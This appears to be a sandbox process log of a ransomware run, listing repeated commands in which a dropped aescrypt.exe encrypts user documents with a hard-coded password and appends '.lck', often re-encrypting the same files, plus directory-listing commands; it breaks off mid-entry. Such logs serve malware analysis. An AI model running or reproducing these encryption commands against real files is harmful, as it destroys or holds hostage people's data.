C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
3⤵
- Executes dropped EXE
PID:500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2300

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
PID:1512

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
- Executes dropped EXE
PID:1932

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
3⤵
- Executes dropped EXE
PID:3108

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
3⤵
- Executes dropped EXE
PID:3080

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
3⤵
- Executes dropped EXE
PID:2132

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
3⤵
- Executes dropped EXE
PID:3548

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
3⤵
- Executes dropped EXE
PID:2540

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck" "These.docx.lck"
3⤵
- Executes dropped EXE
PID:3380

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck" "Are.docx.lck"
3⤵
- Executes dropped EXE
PID:1980

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck" "Recently.docx.lck"
3⤵
- Executes dropped EXE
PID:2264

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck" "Files.docx.lck"
3⤵
- Executes dropped EXE
PID:2008

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck" "Opened.docx.lck"
3⤵
- Executes dropped EXE
PID:2232

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
3⤵
- Executes dropped EXE
PID:2192

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck" "LimitBackup.mpp.lck"
3⤵
- Executes dropped EXE
PID:944

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
3⤵
- Executes dropped EXE
PID:1748

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck" "TraceSave.xlsm.lck"
3⤵
- Executes dropped EXE
PID:3952

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
3⤵
- Executes dropped EXE
PID:816

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck" "TestOptimize.ppsx.lck"
3⤵
- Executes dropped EXE
PID:1896

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
3⤵
- Executes dropped EXE
PID:2260

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck" "NewMeasure.vstx.lck"
3⤵
- Executes dropped EXE
PID:2324

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
3⤵
- Executes dropped EXE
PID:2912

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck" "AssertDebug.xlsm.lck"
3⤵
- Executes dropped EXE
PID:2820

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
3⤵
- Executes dropped EXE
PID:2500

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck" "ExpandConfirm.dotx.lck"
3⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
3⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck" "StartProtect.wps.lck"
3⤵
PID:256

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
3⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck" "RenameCompare.mpp.lck"
3⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
3⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck" "StartInitialize.pub.lck"
3⤵
PID:1400

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
3⤵
PID:652

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck" "DenyBackup.vstm.lck"
3⤵
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2492

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:516

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
3⤵
PID:2212

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
3⤵
PID:2492

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
3⤵
PID:2208

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
3⤵
PID:3320

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
3⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
3⤵
PID:4120

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck" "These.docx.lck"
3⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck" "Recently.docx.lck"
3⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck" "Are.docx.lck"
3⤵
PID:4168

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck" "Opened.docx.lck"
3⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck" "Files.docx.lck"
3⤵
PID:4200

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
3⤵
PID:4216

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
3⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
3⤵
PID:4248

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
3⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
3⤵
PID:4280

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
3⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck" "LimitBackup.mpp.lck"
3⤵
PID:4312

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck.lck" "LimitBackup.mpp.lck.lck"
3⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
3⤵
PID:4344

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck" "TraceSave.xlsm.lck"
3⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck.lck" "TraceSave.xlsm.lck.lck"
3⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
3⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck" "TestOptimize.ppsx.lck"
3⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck.lck" "TestOptimize.ppsx.lck.lck"
3⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
3⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck" "NewMeasure.vstx.lck"
3⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck.lck" "NewMeasure.vstx.lck.lck"
3⤵
PID:4472

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
3⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck" "AssertDebug.xlsm.lck"
3⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck.lck" "AssertDebug.xlsm.lck.lck"
3⤵
PID:4520

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
3⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck" "ExpandConfirm.dotx.lck"
3⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck.lck" "ExpandConfirm.dotx.lck.lck"
3⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
3⤵
PID:4584

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck" "StartProtect.wps.lck"
3⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck.lck" "StartProtect.wps.lck.lck"
3⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
3⤵
PID:4632

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck" "RenameCompare.mpp.lck"
3⤵
PID:4648

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck.lck" "RenameCompare.mpp.lck.lck"
3⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
3⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck" "StartInitialize.pub.lck"
3⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck.lck" "StartInitialize.pub.lck.lck"
3⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
3⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck" "DenyBackup.vstm.lck"
3⤵
PID:4776

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck.lck" "DenyBackup.vstm.lck.lck"
3⤵
PID:4792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4808

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
3⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck.lck" "desktop.ini.lck.lck.lck"
3⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
3⤵
PID:4872

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
3⤵
PID:4884

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
3⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
3⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
3⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck" "These.docx.lck"
3⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck" "Are.docx.lck"
3⤵
PID:4948

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck" "Recently.docx.lck"
3⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck" "Files.docx.lck"
3⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck" "Opened.docx.lck"
3⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
3⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
